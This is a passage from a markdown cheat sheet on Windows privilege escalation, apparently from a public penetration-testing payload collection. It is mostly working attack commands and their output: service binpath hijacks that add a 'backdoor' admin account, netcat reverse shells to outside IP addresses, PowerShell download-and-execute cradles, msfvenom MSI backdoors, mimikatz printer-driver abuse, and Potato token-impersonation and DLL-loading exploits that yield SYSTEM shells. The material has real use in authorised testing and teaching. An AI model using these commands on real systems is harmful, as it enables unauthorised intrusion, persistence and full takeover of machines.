BUILTIN\Administrators + SERVICE_ALL_ACCESS + RW NT AUTHORITY\Authenticated Users + SERVICE_ALL_ACCESS + RW BUILTIN\Power Users + SERVICE_ALL_ACCESS + +$ sc config binpath="net user backdoor backdoor123 /add" +$ sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" +$ sc stop +$ sc start +$ sc config binpath="net localgroup Administrators backdoor /add" +$ sc stop +$ sc start +``` + +## EoP - Windows Subsystem for Linux (WSL) + +Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) + +> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ .exe --default-user root. Now start your bind shell or reverse. + +```powershell +wsl whoami +./ubuntun1604.exe config --default-user root +wsl whoami +wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' +``` + +Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` + +Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` + +## EoP - Unquoted Service Paths + +The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. + +```powershell +wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ + +wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ + +gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name +``` + +* Metasploit exploit : `exploit/windows/local/trusted_service_path` +* PowerUp exploit + ```powershell + # find the vulnerable application + C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" + + ... + [*] Checking for unquoted service paths... + ServiceName : BBSvc + Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe + StartName : LocalSystem + AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path + ... + + # automatic exploit + Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" + ``` + +### Example + +For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: +- `C:\Program.exe` +- `C:\Program Files.exe` + + +## EoP - $PATH Interception + +Requirements: +- PATH contains a writeable folder with low privileges. +- The writeable folder is _before_ the folder that contains the legitimate binary. + +EXAMPLE: +```powershell +# List contents of the PATH environment variable +# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 +$env:Path + +# See permissions of the target folder +# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW +icacls.exe "C:\Program Files\nodejs\" + +# Place our evil-file in that folder. +copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" +``` + +Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. + + +## EoP - Named Pipes + +1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` +2. Check named pipes DACL: `pipesec.exe ` +3. Reverse engineering software +4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` + + +## EoP - Kernel Exploitation + +List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) + +##### #Security Bulletin   #KB     #Description    #Operating System +- [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) +- [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) +- [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) +- [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) +- [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) +- [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) +- [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) +- [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) +- [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) +- [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) +- [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) +- [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) +- [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) +... +- [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) + +To cross compile a program from Kali, use the following command. + +```powershell +Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c +``` + +## EoP - Microsoft Windows Installer + +### AlwaysInstallElevated + +Using the `reg query` command, you can check the status of the `AlwaysInstallElevated` registry key for both the user and the machine. If both queries return a value of `0x1`, then `AlwaysInstallElevated` is enabled for both user and machine, indicating the system is vulnerable. + +* Shell command + ```powershell + reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + ``` +* PowerShell command + ```powershell + Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer + Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer + ``` + +Then create an MSI package and install it. + +```powershell +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi +$ msiexec /quiet /qn /i C:\evil.msi +``` + +Technique also available in : +* Metasploit : `exploit/windows/local/always_install_elevated` +* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` + + +### CustomActions + +> Custom Actions in MSI allow developers to specify scripts or executables to be run at various points during an installation + +* [mgeeky/msidump](https://github.com/mgeeky/msidump) - a tool that analyzes malicious MSI installation packages, extracts files, streams, binary data and incorporates YARA scanner. +* [activescott/lessmsi](https://github.com/activescott/lessmsi) - A tool to view and extract the contents of an Windows Installer (.msi) file. +* [mandiant/msi-search](https://github.com/mandiant/msi-search) - This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file. + +Enumerate products on the machine + +```ps1 +wmic product get identifyingnumber,name,vendor,version +``` + +Execute the repair process with the `/fa` parameter to trigger the CustomActions. +We can use both IdentifyingNumber `{E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1}` or path to the installer `c:\windows\installer\XXXXXXX.msi`. +The repair will run with the NT SYSTEM account. + +```ps1 +$installed = Get-WmiObject Win32_Product +$string= $installed | select-string -pattern "PRODUCTNAME" +$string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}' +Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])" +``` + +Common mistakes in MSI installers: + +* Missing quiet parameters: it will spawn `conhost.exe` as `NT SYSTEM`. Use `[CTRL]+[A]` to select some text in it, it will pause the execution. + * conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –> cmd.exe +* GUI with direct actions: open a URL and start the browser then use the same scenario. +* Binaries/Scripts loaded from user writable paths: you might need to win the race condition. +* DLL hijacking/search order abusing +* PowerShell `-NoProfile` missing: Add custom commands into your profile + ```ps1 + new-item -Path $PROFILE -Type file -Force + echo "Start-Process -FilePath cmd.exe -Wait;" > $PROFILE + ``` + + +## EoP - Insecure GUI apps + +Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. + +Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" + + +## EoP - Evaluating Vulnerable Drivers + +Look for vuln drivers loaded, we often don't spend enough time looking at this: + +* [Living Off The Land Drivers](https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. +* Native binary: DriverQuery.exe + ```powershell + PS C:\Users\Swissky> driverquery.exe /fo table /si + Module Name Display Name Driver Type Link Date + ============ ====================== ============= ====================== + 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM + 3ware 3ware Kernel 5/18/2015 6:28:03 PM + ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM + AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM + acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM + acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM + AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM + acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM + ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM + + ``` +* [matterpreter/OffensiveCSharp/DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery) + ```powershell + PS C:\Users\Swissky> DriverQuery.exe --no-msft + [+] Enumerating driver services... + [+] Checking file signatures... + Citrix USB Filter Driver + Service Name: ctxusbm + Path: C:\Windows\system32\DRIVERS\ctxusbm.sys + Version: 14.11.0.138 + Creation Time (UTC): 17/05/2018 01:20:50 + Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US + Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US + + ``` + +## EoP - Printers + +### Universal Printer + +Create a Printer + +```ps1 +$printerName = 'Universal Priv Printer' +$system32 = $env:systemroot + '\system32' +$drivers = $system32 + '\spool\drivers' +$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName + +Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') +Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') +Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') + +Add-PrinterDriver -Name 'Generic / Text Only' +Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared + +New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null +New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null +New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null +``` + +Execute the driver + +```ps1 +$serverName = 'dc.purple.lab' +$printerName = 'Universal Priv Printer' +$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue +Add-Printer -ConnectionName $fullprinterName +``` + +### PrinterNightmare + +```ps1 +git clone https://github.com/Flangvik/DeployPrinterNightmare +PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell +[<3] @Flangvik - TrustedSec +[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Adding printer driver => Generic / Text Only! +[+] Adding printer => EasySystemShell! +[+] Setting 64-bit Registry key +[+] Setting 32-bit Registry key +[+] Setting '*' Registry key +``` + +```ps1 +PS C:\target> $serverName = 'printer-installed-host' +PS C:\target> $printerName = 'EasySystemShell' +PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue +PS C:\target> Add-Printer -ConnectionName $fullprinterName +``` + +### Bring Your Own Vulnerability + +Concealed Position : https://github.com/jacob-baines/concealed_position + +* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE +* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE +* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE +* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE + +```powershell +cp_server.exe -e ACIDDAMAGE +# Get-Printer +# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing" +cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE +cp_client.exe -l -e ACIDDAMAGE +``` + +## EoP - Runas + +Use the `cmdkey` to list the stored credentials on the machine. + +```powershell +cmdkey /list +Currently stored credentials: + Target: Domain:interactive=WORKGROUP\Administrator + Type: Domain Password + User: WORKGROUP\Administrator +``` + +Then you can use `runas` with the `/savecred` options in order to use the saved credentials. +The following example is calling a remote binary via an SMB share. +```powershell +runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" +runas /savecred /user:Administrator "cmd.exe /k whoami" +``` + +Using `runas` with a provided set of credential. + +```powershell +C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" +``` + +```powershell +$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$computer = "" +[System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) +``` + +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + +## EoP - From local administrator to NT SYSTEM + +```powershell +PsExec.exe -i -s cmd.exe +``` + +## EoP - Living Off The Land Binaries and Scripts + +Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/ + +> The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. + +A LOLBin/Lib/Script must: + +* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. +Have extra "unexpected" functionality. It is not interesting to document intended use cases. +Exceptions are application whitelisting bypasses +* Have functionality that would be useful to an APT or red team + +```powershell +wmic.exe process call create calc +regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll +Microsoft.Workflow.Compiler.exe tests.xml results.xml +``` + +## EoP - Impersonation Privileges + +Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. + +| Privilege | Impact | Tool | Execution path | Remarks | +| --- | --- | --- | --- | --- | +|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [AurĂŠlien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | +|`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP

- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.

- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | +|`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || +|`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | +|`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`
2. Exploit the driver vulnerability

Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)
2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | +|`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | +|`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | +|`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || + +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + +### RottenPotato (Token Impersonation) + +* Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) +* Exploit using Metasploit with `incognito mode` loaded. + ```c + getuid + getprivs + use incognito + list\_tokens -u + cd c:\temp\ + execute -Hc -f ./rot.exe + impersonate\_token "NT AUTHORITY\SYSTEM" + ``` + +```powershell +Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" +Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" +``` + + +### Juicy Potato (Abusing the golden privileges) + +> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato** +> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato** + +* Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases) + +1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) + + ```powershell + whoami /priv + ``` + +2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object + + * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) + * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise) + * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise) + * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro) + * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) + * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter) + * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) + +3. Execute JuicyPotato to run a privileged command. + + ```powershell + JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} + JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} + JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" + Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 + ...... + [+] authresult 0 + {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM + [+] CreateProcessWithTokenW OK + ``` + +### Rogue Potato (Fake OXID Resolver) + +* Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) + +```powershell +# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port +socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 + +# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. +# Use this if you have fw restrictions. +RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" + +# RoguePotato all in one with RogueOxidResolver running locally on port 9999 +RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 + +#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename +RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode +``` + +### EFSPotato (MS-EFSR EfsRpcOpenFileRaw) + +* Binary available at https://github.com/zcgonvh/EfsPotato + +```powershell +# .NET 4.x +csc EfsPotato.cs +csc /platform:x86 EfsPotato.cs + +# .NET 2.0/3.5 +C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs +C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs +``` + +### JuicyPotatoNG + +* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) + +```powershell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt +``` + + +### PrintSpoofer (Printer Bug) + +> this work if SeImpersonatePrivilege is enabled + +* Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0 + +```powershell +# run nc -lnvp 443 then : +.\PrintSpoofer64.exe -c "C:\Temp\nc64.exe 192.168.45.171 443 -e cmd" +# without listener +.\PrintSpoofer64.exe -i -c cmd +# Via RPD +.\PrintSpoofer64.exe -d 3 -c "powershell -ep bypass" +``` + +## EoP - Privileged File Write + +### DiagHub + +:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs. + +The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. +This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory. + +#### Exploit + +1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32` +2. Build https://github.com/xct/diaghub +3. `diaghub.exe c:\\ProgramData\\ payload.dll` + +The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe` + +Alternative tools: +* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag +* https://github.com/decoder-it/diaghub_exploit + + +### UsoDLLLoader + +:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. + +> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo) + +If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**. + +#### Exploit + +1. Build https://github.com/itm4n/UsoDllLoader + * Select Release config and x64 architecure. + * Build solution. + * DLL .\x64\Release\WindowsCoreDeviceInfo.dll + * Loader .\x64\Release\UsoDllLoader.exe. +2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\` +3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337. + + +### WerTrigger + +> Exploit Privileged File Writes bugs with Windows Problem Reporting + +1. Clone https://github.com/sailay1996/WerTrigger +2. Copy `phoneinfo.dll` to `C:\Windows\System32\` +3. Place `Report.wer` file and `WerTrigger.exe` in a same directory. +4. Then, run `WerTrigger.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + +### WerMgr + +> Exploit Privileged Directory Creation Bugs with Windows Error Reporting + +1. Clone https://github.com/binderlabs/DirCreate2System +2. Create directory `C:\Windows\System32\wermgr.exe.local\` +3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` +4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + + +## EoP - Privileged File Delete + +During an MSI installation, the Windows Installer service maintains a record of every changes in case it needs to be rolled back, to do that it will create: + +* a folder at `C:\Config.Msi` containing + * a rollback script (`.rbs`) + * a rollback file (`.rbf`) + +To convert a privileged file delete to a local privilege escalation, you need to abuse the Windows Installer service. +* delete the protected `C:\Config.Msi` folder immediately after it's created by the Windows Installer +* recreate the `C:\Config.Msi` folder with weak DACL permissions since ordinary users are allowed to create folders at the root of `C:\`. +* drop malicious `.rbs` and `.rbf` files into it to be executed by the MSI rollback +* then upon rollback, Windows Installer will make arbitrary changes to the system + +The easiest way to trigger this chain is using 